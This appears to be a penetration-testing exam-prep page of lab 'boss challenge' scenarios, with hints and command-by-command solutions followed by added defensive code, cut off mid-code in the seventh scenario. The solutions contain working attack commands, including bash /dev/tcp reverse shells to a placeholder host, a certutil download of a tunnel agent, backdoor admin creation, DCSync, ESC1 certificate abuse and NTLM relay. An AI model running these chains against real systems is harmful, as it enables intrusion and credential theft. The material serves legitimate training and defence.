Boss Challenges
10 full penetration test scenarios to validate your skills before the CPTS exam. Progressive hints available — attempt each scenario before revealing the solution.
BOSS-01
The Forgotten Admin Share
Medium
SMB · PrivEsc
// SCENARIO
You are performing an internal pentest against a small corporate network. Your starting position: connected to the network with no credentials. Nmap reveals a Windows Server 2019 host at 10.10.10.50 with SMB (445), RDP (3389), and WinRM (5985) open. Your task: gain administrative access to this host.
// OBJECTIVES
- Enumerate all SMB shares (including hidden/admin shares)
- Identify accessible shares and extract credentials from any configuration files
- Use discovered credentials to gain initial foothold
- Escalate privileges to SYSTEM
- Document all findings in report format
// HINTS (attempt first)
Hint 1: Run nxc smb 10.10.10.50, then nxc smb 10.10.10.50 -u '' -p '' --shares for null-session share enumeration. Check for non-standard shares.
Hint 2: If you find a readable share with config files, grep for password patterns. Try discovered credentials with nxc smb 10.10.10.50 -u USER -p PASS --shares to see what you can now access.
Hint 3: Check whoami /priv after getting a shell. SeImpersonatePrivilege? Use PrintSpoofer or GodPotato.
// SOLUTION
Step 1: SMB Enumeration
nxc smb 10.10.10.50
nxc smb 10.10.10.50 -u '' -p '' --shares
enum4linux-ng -A 10.10.10.50
Step 2: Null Session Share Access
smbclient //10.10.10.50/IT_Config -N
# Inside the smbclient session:
ls
get web.config
# web.config contains: connectionString="...password=Adm1nP@ss2024..."
Step 3: Credential Validation + Shell
nxc smb 10.10.10.50 -u svc_web -p 'Adm1nP@ss2024'
evil-winrm -i 10.10.10.50 -u svc_web -p 'Adm1nP@ss2024'
Step 4: Privilege Escalation
whoami /priv
# SeImpersonatePrivilege Enabled → GodPotato
# In the Evil-WinRM session:
upload GodPotato-NET4.exe C:\Windows\Temp\gp.exe
C:\Windows\Temp\gp.exe -cmd "net user backdoor Pass123! /add && net localgroup administrators backdoor /add"
# Login as backdoor via Evil-WinRM → SYSTEM-level access
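The finding in Step 2 is a credential sitting in a config file on a share that anyone can read. The defensive counterpart is to scan your own shares for exactly that before an attacker does. The script below is an added example for this page (not part of the original challenge text or any tool it names): it runs credential-pattern regexes over file contents and reports each hit redacted, so the report itself does not become another copy of the password. The file contents and the secrets in them are constructed for the demonstration.

```python
import re

# Constructed file contents standing in for what a null session could read
# from the IT_Config share. Nothing here comes from a real system.
SAMPLE_FILES = {
    "web.config": (
        '<configuration>\n'
        '  <connectionStrings>\n'
        '    <add name="AppDb" connectionString="Server=db01;Database=inv;'
        'User Id=svc_web;Password=Adm1nP@ss2024;" />\n'
        '  </connectionStrings>\n'
        '  <appSettings>\n'
        '    <add key="SmtpPassword" value="M@ilR3lay!" />\n'
        '    <add key="Theme" value="dark" />\n'
        '  </appSettings>\n'
        '</configuration>\n'
    ),
    "backup.ini": "[db]\nhost=db01\npassword = Winter2023\n[ui]\ncolor=blue\n",
    "readme.txt": "Restart the service after changing the password policy.\n",
}

# Each pattern captures the secret itself in group 1 so it can be redacted.
PATTERNS = [
    # "Password=...;" inside an ADO.NET/ODBC connection string
    ("connection-string password",
     re.compile(r"(?i)(?:password|pwd)\s*=\s*([^;\"'\s]+);")),
    # <add key="...Password..." value="..."/> in appSettings
    ("appSettings password key",
     re.compile(r'(?i)<add\s+key="[^"]*(?:password|secret|key)[^"]*"\s+value="([^"]+)"')),
    # password = value on its own line (ini / key-value files)
    ("ini/key-value password",
     re.compile(r"(?im)^\s*(?:password|passwd|pwd)\s*[=:]\s*(\S+)\s*$")),
]

def redact(secret: str) -> str:
    """Keep the first character and the length: enough to prove the finding, not to reuse it."""
    return secret[0] + "*" * (len(secret) - 1) if secret else ""

def scan_text(text: str):
    """Return [(pattern name, redacted secret)] for every credential-looking value in one file."""
    hits = []
    for name, rx in PATTERNS:
        for m in rx.finditer(text):
            hits.append((name, redact(m.group(1))))
    return hits

def scan_files(files: dict) -> dict:
    """Scan a mapping of filename -> content; files without hits are omitted from the result."""
    return {fname: hits for fname, text in files.items() if (hits := scan_text(text))}

if __name__ == "__main__":
    for fname, hits in scan_files(SAMPLE_FILES).items():
        for kind, value in hits:
            print(f"{fname}: {kind}: {value}")
```

The fix the finding points at is not only removing the anonymous read access on the share: the connection string should use integrated authentication or a protected configuration section so that there is no plaintext password to find.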
BOSS-02
Web to Shell: The Exposed API
Medium
Web · Command Injection
// SCENARIO
A web application runs on 10.10.10.60:80. Initial Nmap shows HTTP and SSH (22). The site is a simple inventory management tool with a search function. Your goal: achieve Remote Code Execution and gain a reverse shell.
// OBJECTIVES
- Fuzz the web application for hidden directories and parameters
- Identify and confirm command injection vulnerability
- Bypass any filters and obtain a reverse shell
- Escalate to root via discovered sudo rights
// HINTS (attempt first)
Hint 1: Use ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://10.10.10.60/FUZZ. Look for an API endpoint like /api/v1/.
Hint 2: Test the search/query parameter with ; id, | id, && id. Check the response body — if command output appears, you have injection.
Hint 3: If spaces are filtered, use ${IFS} instead. If semicolons are blocked, try |. URL-encode if sending via a GET parameter.
// SOLUTION
Step 1: Directory Fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
  -u http://10.10.10.60/FUZZ -mc 200,301,302
# Finds: /api/v1/search
Step 2: Confirm Command Injection
curl "http://10.10.10.60/api/v1/search?q=test;id"
# Response: uid=33(www-data) gid=33(www-data)...
Step 3: Reverse Shell
# Start listener:
nc -lvnp 4444
# Send shell payload (URL encoded; KALI is your listener's IP):
curl "http://10.10.10.60/api/v1/search?q=test;bash%20-c%20'bash%20-i%20>%26%20/dev/tcp/KALI/4444%200>%261'"
Step 4: PrivEsc
sudo -l
# (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'
# Root shell!
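Why the search endpoint falls to `;id` and `${IFS}` is worth seeing in code. The following is an added example (not the challenge's application, which the page never shows): a search function written the way the vulnerable endpoint must have been, beside two fixes. The inventory data is constructed. The vulnerable version builds a shell command string from the query; the hardened versions validate the term against an allowlist and, independently, never pass it through a shell at all.

```python
import re
import subprocess

# Constructed inventory data; stands in for whatever the real app searched over.
INVENTORY = "widget-a 12\nwidget-b 7\ngadget-c 3\n"

def search_vulnerable(q: str) -> str:
    """The pattern behind Step 2: user input pasted into a shell command line.

    shell=True hands the whole string to /bin/sh, so ';', '|', '&&' and ${IFS}
    in q are interpreted exactly as the hints describe.
    """
    cmd = f"printf '%s' '{INVENTORY}' | grep -- {q}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout + proc.stderr

# Allowlist for the search term: only characters a product name can contain.
SAFE_TERM = re.compile(r"[A-Za-z0-9_-]{1,64}")

def search_hardened(q: str) -> str:
    """Same feature, two independent fixes: reject anything outside the allowlist,
    and run grep with an argument list plus stdin, so no shell ever parses q."""
    if not SAFE_TERM.fullmatch(q):
        raise ValueError("invalid search term")
    proc = subprocess.run(["grep", "--", q], input=INVENTORY,
                          capture_output=True, text=True)
    return proc.stdout

def search_in_process(q: str) -> str:
    """Best option when the external tool is not actually needed: no process at all."""
    if not SAFE_TERM.fullmatch(q):
        raise ValueError("invalid search term")
    return "".join(line + "\n" for line in INVENTORY.splitlines() if q in line)

if __name__ == "__main__":
    print(search_vulnerable("widget;echo INJECTED"))   # second command runs
    print(search_hardened("widget"))                   # only the grep output
```

Note that the allowlist alone would have stopped `${IFS}` (it rejects `$`), and the argument-list call alone would have made `;id` a literal search term; defence in depth here costs one line each.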
BOSS-03
Active Directory First Blood
Hard
AD · Kerberoasting
// SCENARIO
Internal network. You have compromised a low-privilege domain user account: jdoe / Welcome1 on CORP.LOCAL (DC: 10.10.10.5). Your target: Domain Admin. No BloodHound data yet. Start from scratch and reach DA.
// OBJECTIVES
- Collect BloodHound data with the provided credentials
- Identify attack paths (Kerberoasting, AS-REP Roasting, or ACL abuse)
- Crack/exploit discovered hashes or paths
- DCSync to obtain all domain hashes
- Demonstrate DA access (list C$ on DC)
// HINTS (attempt first)
Hint 1: Run bloodhound-python -u jdoe -p 'Welcome1' -d corp.local -dc-ip 10.10.10.5 -c All --zip. Also run impacket-GetUserSPNs corp.local/jdoe:'Welcome1' -dc-ip 10.10.10.5 -request.
Hint 2: In BloodHound, mark jdoe as Owned. Run "Find Shortest Paths from Owned Principals." Also check "List all Kerberoastable Accounts."
Hint 3: After cracking the SPN hash: use the service account to check BloodHound for further paths. If it has DCSync rights → impacket-secretsdump.
// SOLUTION
Step 1: BloodHound Collection + Kerberoasting
bloodhound-python -u jdoe -p 'Welcome1' -d corp.local -dc-ip 10.10.10.5 -c All --zip
impacket-GetUserSPNs corp.local/jdoe:'Welcome1' -dc-ip 10.10.10.5 -request -outputfile spns.txt
Step 2: Crack SPN Hash
hashcat -m 13100 spns.txt /usr/share/wordlists/rockyou.txt
# Cracked: svc_sql / SqlAdmin2024!
Step 3: BloodHound Path from svc_sql
# BloodHound shows: svc_sql → GenericWrite → HR_MANAGERS group
# HR_MANAGERS → WriteDACL → Domain Admins
# Add svc_sql to HR_MANAGERS:
net rpc group addmem "HR_MANAGERS" "svc_sql" -U corp.local/svc_sql%'SqlAdmin2024!' -S 10.10.10.5
Step 4: WriteDACL → DCSync → DA
impacket-dacledit corp.local/svc_sql:'SqlAdmin2024!' -dc-ip 10.10.10.5 \
  -action write -rights DCSync -principal svc_sql -target-dn "DC=corp,DC=local"
impacket-secretsdump corp.local/svc_sql:'SqlAdmin2024!'@10.10.10.5 -just-dc-ntlm
# Got: Administrator:500:...:8f617b3daa4f19d10b...
nxc smb 10.10.10.5 -u Administrator -H 8f617b3daa4f19d10b... --shares
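Step 1's `GetUserSPNs -request` leaves a distinctive trace on the domain controller: a burst of event 4769 (Kerberos service ticket requested) entries from one user, one per Kerberoastable account, with ticket encryption type 0x17 (RC4), which is what hashcat mode 13100 (`$krb5tgs$23$`) cracks. The detection below is an added example, not part of the page or of any SIEM product; the events are constructed in the shape of 4769's data fields, and the 5-minute/3-SPN thresholds are assumptions to tune for your environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4; AES tickets show as 0x11 / 0x12

# Constructed 4769 (service ticket requested) events using the event's own field names.
# jdoe's burst mimics GetUserSPNs -request in Step 1; the rest is normal background traffic.
EVENTS = [
    {"time": "2024-05-01T09:00:01", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.200"},
    {"time": "2024-05-01T09:00:01", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_http",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.200"},
    {"time": "2024-05-01T09:00:02", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.200"},
    {"time": "2024-05-01T09:00:02", "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.200"},
    {"time": "2024-05-01T09:05:00", "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.201"},
    {"time": "2024-05-01T10:00:00", "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.201"},
]

def is_roast_candidate(ev: dict) -> bool:
    """An RC4 service ticket for a user-type service account: not krbtgt, not a machine account.
    Machine accounts have long random passwords and are not worth roasting; krbtgt tickets are TGTs."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and svc.lower() != "krbtgt"
            and not svc.endswith("$"))

def detect_kerberoasting(events, window=timedelta(minutes=5), min_spns=3) -> dict:
    """Alert when one account requests RC4 tickets for >= min_spns distinct service
    accounts inside `window`. Returns {requesting account: sorted service names}."""
    by_user = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            by_user[ev["TargetUserName"]].append(
                (datetime.fromisoformat(ev["time"]), ev["ServiceName"]))
    alerts = {}
    for user, reqs in by_user.items():
        reqs.sort()
        # slide a window starting at each request; alert on the first one that fills it
        for i, (start, _) in enumerate(reqs):
            spns = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(spns) >= min_spns:
                alerts[user] = sorted(spns)
                break
    return alerts

if __name__ == "__main__":
    for user, spns in detect_kerberoasting(EVENTS).items():
        print(f"possible Kerberoasting by {user}: {', '.join(spns)}")
```

A single RC4 ticket is not evidence on its own (asmith's one request above is not flagged), so the rule keys on volume and distinct targets. The corresponding mitigations are the ones that make the cracked hash in Step 2 impossible: AES-only service accounts (no 0x17 tickets at all) and long random or group-managed service account passwords.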
BOSS-04
The Database Pivot
Hard
SQLi · Pivoting
// SCENARIO
External pentest. Target: a web application at 10.10.10.70 with a login form. Behind the DMZ is an internal network 172.16.5.0/24 that is not directly reachable from your Kali. Your goal: get RCE on a host in the internal network.
// OBJECTIVES
- Identify and exploit SQL injection in the login form
- Read files or execute OS commands via SQLi (MSSQL xp_cmdshell)
- Set up a tunnel to the internal network via the compromised host
- Enumerate and compromise a host in 172.16.5.0/24
// HINTS (attempt first)
Hint 1: Test ' OR '1'='1 in the login form. Check if it's MSSQL with error-based injection: ' AND 1=CONVERT(int,@@version)--. If MSSQL → xp_cmdshell may be available.
Hint 2: Enable xp_cmdshell: '; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- then '; EXEC xp_cmdshell 'whoami';--
Hint 3: Upload the Ligolo-ng agent via xp_cmdshell + certutil. Connect it to your Kali proxy. Add a route for 172.16.5.0/24. Scan from Kali directly.
// SOLUTION
Step 1: SQLi + xp_cmdshell
sqlmap -u "http://10.10.10.70/login" --data "user=test&pass=test" \
  --dbms=mssql --os-shell
# sqlmap enables xp_cmdshell automatically and gives an OS shell
Step 2: Upload Ligolo Agent
# At the sqlmap os-shell prompt, type the OS command directly (sqlmap wraps it in xp_cmdshell for you):
certutil -urlcache -split -f http://KALI_IP/agent.exe C:\Windows\Temp\agent.exe
C:\Windows\Temp\agent.exe -connect KALI_IP:11601 -ignore-cert
Step 3: Set Up Pivot
# On Kali, create the TUN interface once, then start the proxy:
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
sudo ./proxy -selfcert
# In the Ligolo proxy console:
session      # select the agent
ifconfig     # shows the 172.16.5.0/24 interface
start
# Back in a Kali shell:
sudo ip route add 172.16.5.0/24 dev ligolo
Step 4: Compromise Internal Host
nmap -sV 172.16.5.0/24 --open -T4
# Finds: 172.16.5.10 with SMB open
nxc smb 172.16.5.10 -u administrator -p 'Password123'
# Reused creds from MSSQL sa account → admin on internal host!
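The login form in Step 1 fails because the credentials are concatenated into the SQL text. The following added example (not the challenge's application) shows the vulnerable query beside the parameterized one, using Python's built-in sqlite3 so it runs anywhere; the user table and its single row are constructed. The `' OR '1'='1` payload from Hint 1 logs in against the first function and is just a wrong password against the second.

```python
import sqlite3

def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's user table (constructed row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'S3cret!')")
    return conn

def login_vulnerable(conn, user: str, pw: str) -> bool:
    """String-built query: the quote in pw closes the literal and the rest is
    parsed as SQL, so ' OR '1'='1 turns the WHERE clause into a tautology."""
    sql = f"SELECT username FROM users WHERE username = '{user}' AND password = '{pw}'"
    return conn.execute(sql).fetchone() is not None

def login_hardened(conn, user: str, pw: str) -> bool:
    """Parameterized query: the driver sends user and pw as data, never as SQL text.
    (A real login would also compare a password hash, not the plaintext.)"""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (user, pw)).fetchone() is not None

def injected_sql(user: str, pw: str) -> str:
    """Show what the vulnerable version actually executes, for the report."""
    return f"SELECT username FROM users WHERE username = '{user}' AND password = '{pw}'"

if __name__ == "__main__":
    conn = setup_db()
    print(injected_sql("admin", "' OR '1'='1"))
    print("vulnerable:", login_vulnerable(conn, "admin", "' OR '1'='1"))   # True
    print("hardened: ", login_hardened(conn, "admin", "' OR '1'='1"))     # False
```

One difference between this demo and the MSSQL target matters for Hint 2: sqlite3's `execute()` refuses stacked statements, whereas MSSQL runs `'; EXEC sp_configure ...` happily, which is exactly what makes the xp_cmdshell path possible. On the database side the mitigations are a least-privilege application login (not `sa`) and leaving xp_cmdshell disabled; on the network side, the internal host fell to a reused `sa` password, so distinct credentials per system would have stopped Step 4 even after the pivot was built.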
BOSS-05
Certificate Authority Takeover
Expert
ADCS · ESC1
// SCENARIO
Domain credentials obtained: helpdesk / HelpD3sk! on ENTERPRISE.LOCAL. You have no other access. AD CS is deployed. BloodHound shows no obvious paths from helpdesk to DA. Find the ADCS vulnerability and escalate to Domain Admin.
// OBJECTIVES
- Enumerate AD CS for vulnerable templates
- Identify the ESC type and exploitation method
- Request a certificate as Domain Admin
- Authenticate as DA and perform DCSync
// HINTS (attempt first)
Hint 1: Run certipy find -u 'helpdesk@enterprise.local' -p 'HelpD3sk!' -dc-ip DC_IP -vulnerable -stdout. Look for templates where "Enrollee Supplies Subject" is true.
Hint 2: ESC1: certipy req -u helpdesk@enterprise.local -p 'HelpD3sk!' -ca ENTERPRISE-CA -template VulnTemplate -upn administrator@enterprise.local -dc-ip DC_IP
Hint 3: certipy auth -pfx administrator.pfx -dc-ip DC_IP gives the NT hash. Use it with secretsdump for full DCSync.
// SOLUTION
Step 1: Find Vulnerable Template
certipy find -u 'helpdesk@enterprise.local' -p 'HelpD3sk!' \
  -dc-ip 10.10.10.5 -vulnerable -stdout
# Output: Template "CorpUser" — ESC1 (Enrollee Supplies Subject: True, Any domain user can enroll)
Step 2: Request DA Certificate
certipy req -u 'helpdesk@enterprise.local' -p 'HelpD3sk!' \
  -ca 'ENTERPRISE-CA' -template 'CorpUser' \
  -upn 'administrator@enterprise.local' -dc-ip 10.10.10.5
# Saved: administrator.pfx
Step 3: Authenticate + DCSync
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.5
# NT Hash: 8f617b3daa4f19d1...
impacket-secretsdump enterprise.local/administrator@10.10.10.5 -hashes :8f617b3daa4f19d1... -just-dc-ntlm
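Certipy's "ESC1" verdict in Step 1 is the conjunction of four template properties, and knowing them is what lets you fix the template rather than just delete it. The audit below is an added example, not Certipy's code and not part of the page: it evaluates template attributes (the real AD attribute names and flag values, plus a simplified `enroll_sids` list standing in for the template's security descriptor) and returns the reasons a template qualifies. The four templates and the domain SID are constructed; "CorpUser" reproduces the page's finding.

```python
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # bit in msPKI-Enrollment-Flag ("manager approval")

# EKUs that let the issued certificate authenticate to AD (an empty EKU list also does).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "2.5.29.37.0",              # Any Purpose
}
WELL_KNOWN_LOW_PRIV = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}   # Everyone, Authenticated Users, Users

def low_priv_sids(domain_sid: str) -> set:
    # Domain Users (RID 513) and Domain Computers (RID 515) count as "any domain user/computer"
    return WELL_KNOWN_LOW_PRIV | {f"{domain_sid}-513", f"{domain_sid}-515"}

def esc1_findings(t: dict, domain_sid: str) -> list:
    """Return the reasons a template satisfies ESC1, or [] if any condition fails.
    All of: enrollee supplies subject, no approval/signature gate, auth-capable EKU,
    enrollable by a low-privilege principal."""
    if not t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        return []
    if t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        return []                                    # manager approval blocks auto-issuance
    if t["msPKI-RA-Signature"] > 0:
        return []                                    # an authorized signature is required
    ekus = set(t["pKIExtendedKeyUsage"])
    if ekus and not ekus & AUTH_EKUS:
        return []                                    # certificate could not be used for logon
    enrollers = set(t["enroll_sids"]) & low_priv_sids(domain_sid)
    if not enrollers:
        return []
    return [
        "enrollee supplies subject (requester chooses the UPN in the SAN)",
        "no manager approval and no authorized signatures required",
        "EKU allows authentication: " + (", ".join(sorted(ekus & AUTH_EKUS)) or "<none = any purpose>"),
        "enrollable by low-privilege principal(s): " + ", ".join(sorted(enrollers)),
    ]

def audit_templates(templates, domain_sid: str) -> dict:
    return {t["name"]: f for t in templates if (f := esc1_findings(t, domain_sid))}

DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"   # constructed

# Constructed templates. "CorpUser" is the page's Step 1 finding; the others are controls
# that each fail exactly one ESC1 condition.
TEMPLATES = [
    {"name": "CorpUser", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4"],
     "enroll_sids": [f"{DOMAIN_SID}-513"]},
    # subject built from AD (no enrollee-supplies-subject bit), as on the built-in User template
    {"name": "User", "msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x29,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4"],
     "enroll_sids": [f"{DOMAIN_SID}-513"]},
    # enrollee supplies subject, but Server Authentication only: cannot log on with it
    {"name": "WebServer", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
     "enroll_sids": [f"{DOMAIN_SID}-513"]},
    # same as CorpUser but gated by manager approval
    {"name": "ApprovedUser", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll_sids": [f"{DOMAIN_SID}-513"]},
]

if __name__ == "__main__":
    for name, reasons in audit_templates(TEMPLATES, DOMAIN_SID).items():
        print(f"{name}: ESC1\n  " + "\n  ".join(reasons))
```

The three control templates double as the remediation menu for "CorpUser": clear the Enrollee Supplies Subject bit and build the subject from AD, or require manager approval, or restrict enrollment to the group that actually needs the template. Certipy's `-vulnerable` output lists the same conditions; this makes explicit which one your change has to remove.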
BOSS-06
LFI to Shell to Root
Medium
Web · LFI · PrivEsc
// SCENARIO
PHP web application at 10.10.10.80. The site has a page parameter: http://10.10.10.80/index.php?page=home. Your goal: escalate from LFI to Remote Code Execution and obtain root on the Linux server.
// OBJECTIVES
- Confirm LFI vulnerability and read sensitive files (/etc/passwd, SSH keys)
- Escalate LFI to RCE (log poisoning or PHP wrappers)
- Obtain a reverse shell and escalate to root
// HINTS (attempt first)
Hint 1: Try ?page=../../../../etc/passwd. If you see /etc/passwd content, LFI is confirmed. Also try ?page=../../../../var/log/apache2/access.log.
Hint 2: Log poisoning: curl -A '<?php system($_GET["cmd"]); ?>' http://10.10.10.80/ — then ?page=../../../../var/log/apache2/access.log&cmd=id. Or use the PHP filter wrapper: php://filter/convert.base64-encode/resource=index.php.
Hint 3: Once you have a shell as www-data: run sudo -l and find / -perm -4000 2>/dev/null. Check for writable cron jobs.
// SOLUTION
Step 1: Confirm LFI
curl "http://10.10.10.80/index.php?page=../../../../etc/passwd"
# Shows /etc/passwd content — LFI confirmed
Step 2: Log Poisoning → RCE
# Write a PHP payload into the access log via the User-Agent header:
curl -A '<?php system($_GET["cmd"]); ?>' http://10.10.10.80/
# Include the log so the payload executes:
curl "http://10.10.10.80/index.php?page=../../../../var/log/apache2/access.log&cmd=id"
# uid=33(www-data) — RCE confirmed
Step 3: Reverse Shell
# URL-encode the bash reverse shell payload (KALI is your listener's IP):
curl "http://10.10.10.80/index.php?page=../../../../var/log/apache2/access.log&cmd=bash%20-c%20'bash%20-i%20>%26%20/dev/tcp/KALI/4444%200>%261'"
Step 4: Root via SUID
find / -perm -4000 2>/dev/null
# /usr/bin/python3 has SUID bit!
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
whoami
# root
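The `page` parameter is vulnerable because user input becomes part of an include path. The added example below (not the challenge's PHP, which the page never shows) models that include in Python beside two fixes, and adds the detection side: the poisoning step leaves PHP tags and `../` sequences in the Apache access log, which a log review can pick up. The web root, allowlist and log lines are constructed.

```python
import os
import re

WEBROOT = "/var/www/html"                       # constructed web root
PAGES_DIR = os.path.join(WEBROOT, "pages")
ALLOWED_PAGES = {"home", "about", "contact"}    # constructed allowlist

def resolve_page_vulnerable(page: str) -> str:
    """The include behind index.php?page=: input joined straight onto the web root,
    so ../ sequences walk out of it, which is what Step 1 exploits."""
    return os.path.normpath(os.path.join(WEBROOT, page))

def resolve_page_allowlist(page: str) -> str:
    """Preferred fix: the parameter selects a name from a fixed set; the path is
    built from the name, never from the raw input."""
    if page not in ALLOWED_PAGES:
        raise ValueError(f"unknown page: {page!r}")
    return os.path.join(PAGES_DIR, page + ".php")

def resolve_page_confined(page: str) -> str:
    """Fallback when an allowlist is impractical: refuse stream wrappers (php://, data://),
    canonicalise, and require the result to stay under PAGES_DIR."""
    if re.match(r"^[a-z]+://", page):
        raise ValueError("stream wrappers are not allowed")
    base = os.path.realpath(PAGES_DIR)
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the pages directory")
    return target

# Detection: PHP open tags (log poisoning), traversal sequences, or wrapper schemes in request logs.
LFI_INDICATOR = re.compile(r"<\?(?:php|=)|\.\./|php://")

def find_lfi_indicators(lines):
    """Return (line number, line) for access-log entries carrying an LFI/poisoning indicator."""
    return [(i, l) for i, l in enumerate(lines, 1) if LFI_INDICATOR.search(l)]

# Constructed Apache access-log lines: a normal request, the poisoning request (payload in the
# User-Agent field, quotes escaped as Apache writes them), and the include that triggers it.
SAMPLE_LOG = [
    '10.10.10.200 - - [01/May/2024:09:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.10.200 - - [01/May/2024:09:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET[\\"cmd\\"]); ?>"',
    '10.10.10.200 - - [01/May/2024:09:00:09 +0000] "GET /index.php?page=../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9000 "-" "curl/8.0"',
]

if __name__ == "__main__":
    print(resolve_page_vulnerable("../../../../etc/passwd"))   # /etc/passwd
    print(resolve_page_allowlist("home"))
    for n, line in find_lfi_indicators(SAMPLE_LOG):
        print(f"line {n}: {line[:80]}")
```

The allowlist fix removes the whole class: with no attacker-controlled path there is nothing to traverse, no log to include and no wrapper to abuse, so the log-poisoning payload becomes an inert string in a log file. Separately, the SUID python3 in Step 4 has no legitimate reason to exist on a server; a periodic `find / -perm -4000` run by the defender catches it the same way the attacker's did.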
BOSS-07
Poisoned Network
Hard
LLMNR · Relay · AD
// SCENARIO
Newly connected to internal network segment 10.10.20.0/24. No credentials. 3 Windows hosts visible, all domain-joined to FINANCE.LOCAL. SMB signing status unknown. Your goal: capture or relay credentials to gain initial access.
// OBJECTIVES
- Identify hosts with SMB signing disabled (relay targets)
- Set up Responder + ntlmrelayx chain
- Capture or relay credentials to gain local admin
- Dump SAM and identify any domain accounts
// HINTS (attempt first)
Hint 1: nxc smb 10.10.20.0/24 --gen-relay-list relay-targets.txt — this lists hosts without SMB signing. If all hosts have signing enabled, fall back to hash capture and cracking.
Hint 2: Edit /etc/responder/Responder.conf: SMB=Off, HTTP=Off. Then: sudo impacket-ntlmrelayx -tf relay-targets.txt -smb2support and sudo responder -I eth0 -wfv
Hint 3: If the relay gives a SAM dump: use the local admin hash for PTH across the network (nxc smb 10.10.20.0/24 -u Administrator -H HASH --local-auth). Look for shared local admin passwords.
// SOLUTION
Step 1: Find Relay Targets
nxc smb 10.10.20.0/24 --gen-relay-list relay-targets.txt
# relay-targets.txt: 10.10.20.30, 10.10.20.40 (signing disabled)
Step 2: Responder + ntlmrelayx
# Terminal 1:
sudo impacket-ntlmrelayx -tf relay-targets.txt -smb2support
# Terminal 2:
sudo responder -I eth0 -wfv
Step 3: Triggered by LLMNR Broadcast
# After waiting ~2 min, a user tries to access \\fileserver (non-existent)
# Responder answers → ntlmrelayx relays to 10.10.20.30
# SAM dump output:
# Administrator:500:...:e3e3e3e3e3e3e3e3...::: (hash)
Step 4: Lateral Movement
nxc smb 10.10.20.0/24 -u Administrator -H e3e3e3e3e3e3e3e3 --local-auth
# 10.10.20.30 [+] Admin
# 10.10.20.40 [+] Admin ← shared local admin password!
impacket-secretsdump -hashes :e3e3e3e3e3e3e3e3 ./Administrator@10.10.20.40
# Finds domain creds: FINANCE\domain_user:ComplexPass99!
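Step 3 works because a host on the segment answers LLMNR queries for names that do not exist. The same property gives defenders a cheap detector: query LLMNR for a name you know is bogus, and any answer at all identifies a poisoner. The code below is an added example (not Responder, not part of the page): it builds and parses LLMNR messages by hand using the DNS-style layout LLMNR inherits (RFC 4795), with an answer builder used only as a test fixture for the parser. The canary name and all addresses are constructed; `probe()` is the only function that touches the network and is not run by the tests.

```python
import random
import socket
import struct

LLMNR_GROUP = ("224.0.0.252", 5355)     # LLMNR IPv4 multicast group and port (RFC 4795)
QTYPE_A, QCLASS_IN = 1, 1
FLAG_QR = 0x8000                         # "this is a response" bit in the flags field

def _encode_name(name: str) -> bytes:
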